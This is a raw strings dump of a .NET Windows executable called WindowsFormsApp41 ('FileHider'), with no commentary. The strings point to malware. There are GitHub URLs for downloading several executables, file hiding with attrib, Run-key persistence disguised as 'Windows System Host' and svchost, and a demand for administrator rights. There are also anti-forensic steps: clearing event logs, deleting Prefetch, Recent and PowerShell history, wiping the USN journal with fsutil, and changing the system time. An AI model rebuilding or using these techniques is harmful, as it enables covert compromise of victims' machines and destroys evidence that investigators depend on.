!This program cannot be run in DOS mode.
`.rsrc
@.reloc
_, p(
v4.0.30319
#Strings
<process>5__10
<>s__10
<>8__20
<>8__30
<RenameAndMoveFiles>d__30
<>9__30_0
<RenameAndMoveFiles>b__30_0
<>c__DisplayClass31_0
<>c__DisplayClass25_0
<>c__DisplayClass28_0
<ShowAll>b__0
<Main>b__0
<CleanActivityTraces>b__0
<logName>5__11
<processPath>5__11
<>s__21
<CleanActivityTraces>d__31
WindowsFormsApp41
<>c__DisplayClass31_1
<>9__25_1
<Main>b__25_1
<savedTime>5__1
<startInfo>5__1
<>8__1
<CleanActivityTraces>b__1
<>u__1
Func`1
IEnumerable`1
List`1
<randomFileName>5__12
<eventLog>5__12
<>s__22
Microsoft.Win32
<>c__DisplayClass31_2
<kookiPath>5__2
<random>5__2
<>8__2
<CleanActivityTraces>b__2
<>s__2
Func`2
KeyValuePair`2
Dictionary`2
<newPath>5__13
<>s__13
<tempPath>5__23
<>c__DisplayClass31_3
<newTime>5__3
<kvp>5__3
<eventLogNames>5__3
<CleanActivityTraces>b__3
<>s__14
<>s__24
<>c__DisplayClass31_4
<currentFilePath>5__4
<recentPath>5__4
<CleanActivityTraces>b__4
<>s__4
<file>5__15
<>s__25
<>c__DisplayClass31_5
<prefetchPath>5__5
<fileInfo>5__5
<CleanActivityTraces>b__5
<>s__5
<>8__16
<file>5__26
<processName>5__6
<originalDir>5__6
<tempPaths>5__6
<>s__17
<>8__27
<HideAll>d__27
<powerShellHistoryPath>5__7
<processes>5__7
<>s__18
<lines>5__28
<ShowAll>d__28
<cleanUsnInfo>5__8
<>s__8
<file>5__19
<cleanedLines>5__29
<RestoreAndMoveBackFiles>d__29
<>s__9
<Module>
SE_PRIVILEGE_ENABLED
SW_HIDE
SYSTEMTIME
VK_CONTROL
PROCESS_SET_INFORMATION
System.IO
mscorlib
set_Verb
System.Collections.Generic
<<Main>b__25_1>d
Thread
add_Load
isF1Pressed
isF2Pressed
AwaitUnsafeOnCompleted
get_IsCompleted
Synchronized
<OriginalPath>k__BackingField
<OriginalAttributes>k__BackingField
wSecond
Replace
defaultInstance
processesToHide
set_AutoScaleMode
Enumerable
IDisposable
RuntimeTypeHandle
GetTypeFromHandle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_FormBorderStyle
set_WindowStyle
ProcessWindowStyle
get_FileName
set_FileName
GetRandomFileName
fileName
GetProcessesByName
GetDirectoryName
originalTime
GetSystemTime
SetSystemTime
Combine
IAsyncStateMachine
SetStateMachine
stateMachine
LocalMachine
ValueType
System.Core
get_Culture
set_Culture
resourceCulture
ApplicationSettingsBase
Dispose
Create
DebuggerBrowsableState
EditorBrowsableState
set_WindowState
FormWindowState
GetAsyncKeyState
<>1__state
Delete
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AsyncStateMachineAttribute
DebuggerStepThroughAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
wMinute
get_Value
SetValue
WindowsFormsApp41.exe
set_ClientSize
IndexOf
System.Threading
System.Runtime.Versioning
String
disposing
System.Drawing
EventLog
get_ExecutablePath
get_OriginalPath
set_OriginalPath
GetTempPath
GetFolderPath
processInformationLength
StartsWith
wMonth
wDayOfWeek
get_Task
System.Security.Principal
WindowsPrincipal
System.ComponentModel
HideAll
ShowAll
kernel32.dll
user32.dll
ntdll.dll
ContainerControl
Program
set_Item
System
Random
resourceMan
tracesToClean
isHidden
set_ShowIcon
GetExtension
GetFileNameWithoutExtension
Application
processInformation
duration
System.Configuration
System.Globalization
Action
System.Reflection
SearchOption
SetException
StringComparison
StoredFileInfo
CultureInfo
ProcessStartInfo
DirectoryInfo
System.Linq
set_ShowInTaskbar
FileHider
AsyncTaskMethodBuilder
<>t__builder
SpecialFolder
get_ResourceManager
EventHandler
System.CodeDom.Compiler
IContainer
TaskAwaiter
GetAwaiter
ToLower
GetEnumerator
IsAdministrator
.cctor
IntPtr
System.Diagnostics
wMilliseconds
CleanActivityTraces
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
WindowsFormsApp41.Properties.Resources.resources
DebuggingModes
WindowsFormsApp41.Properties
storedFiles
RenameAndMoveFiles
RestoreAndMoveBackFiles
hiddenProcessFiles
GetFiles
ReadAllLines
WriteAllLines
FileAttributes
get_OriginalAttributes
set_OriginalAttributes
GetAttributes
SetAttributes
Settings
EventArgs
<>4__this
System.Threading.Tasks
Equals
processUrls
System.Windows.Forms
processInformationClass
set_PriorityClass
ProcessPriorityClass
hProcess
NtSetInformationProcess
GetCurrentProcess
process
set_Arguments
components
Exists
Concat
Object
WaitForExit
get_Default
GetResult
SetResult
Environment
InitializeComponent
get_Current
GetCurrent
ToList
MoveNext
set_Text
GetConsoleWindow
set_CreateNoWindow
ShowWindow
nCmdShow
frequency
get_Key
OpenSubKey
RegistryKey
get_Assembly
CreateDirectory
set_WorkingDirectory
originalDirectory
targetDirectory
get_CurrentDirectory
Registry
set_Opacity
op_Inequality
WindowsIdentity
IsNullOrEmpty
WrapNonExceptionThrows
WindowsFormsApp41
Copyright
2025
$8318fb6f-6106-4c44-8f9d-c2af416c1b21
1.0.0.0
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.2
FileHider.Program+<HideAll>d__27
FileHider.Program+<ShowAll>d__28
0FileHider.Program+<RestoreAndMoveBackFiles>d__29
+FileHider.Program+<RenameAndMoveFiles>d__30
,FileHider.Program+<CleanActivityTraces>d__31
&FileHider.Program+<>c+<<Main>b__25_1>d
3System.Resources.Tools.StronglyTypedResourceBuilder
4.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
11.0.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
C:\Users\Egor\source\repos\WindowsFormsApp41\WindowsFormsApp41\obj\Debug\WindowsFormsApp41.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
C:\ProgramData\SoftwareDistribution
C:\PerfLogs
CONHOST
putisha
update
version
WindowsFormsApp32
WindowsFormsApp14
Cleaner
KeyGenerator
CommandSender
https://github.com/kfocc557/kfocc/raw/refs/heads/main/CHROM.exe
https://github.com/kfocc557/kfocc/raw/refs/heads/main/CONHOST.exe
https://github.com/kfocc557/kfocc/raw/refs/heads/main/vmss.exe
https://github.com/kfocc557/kfocc/raw/refs/heads/main/jopa.exe
https://github.com/kfocc557/kfocc/raw/refs/heads/main/skeet.exe
https://github.com/kfocc557/kfocc/raw/refs/heads/main/putisha.exe
https://github.com/kfocc557/kfocc/raw/refs/heads/main/kooki.exe
WindowsFormsApp41.Properties.Resources
Microsoft
Windows
SystemData
svchost.exe
cmd.exe
/c attrib +h +s +r "
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows System Host
FileHider
svchost
attrib
ipconfig
Application
Security
System
AppData\Roaming\Microsoft\Windows\Recent
Prefetch
AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
fsutil
usn deletejournal /d c:
/c attrib -h -s -r "
\*.*" /s /d
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
WindowsFormsApp41
FileVersion
1.0.0.0
InternalName
WindowsFormsApp41.exe
LegalCopyright
Copyright
2025
LegalTrademarks
OriginalFilename
WindowsFormsApp41.exe
ProductName
WindowsFormsApp41
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0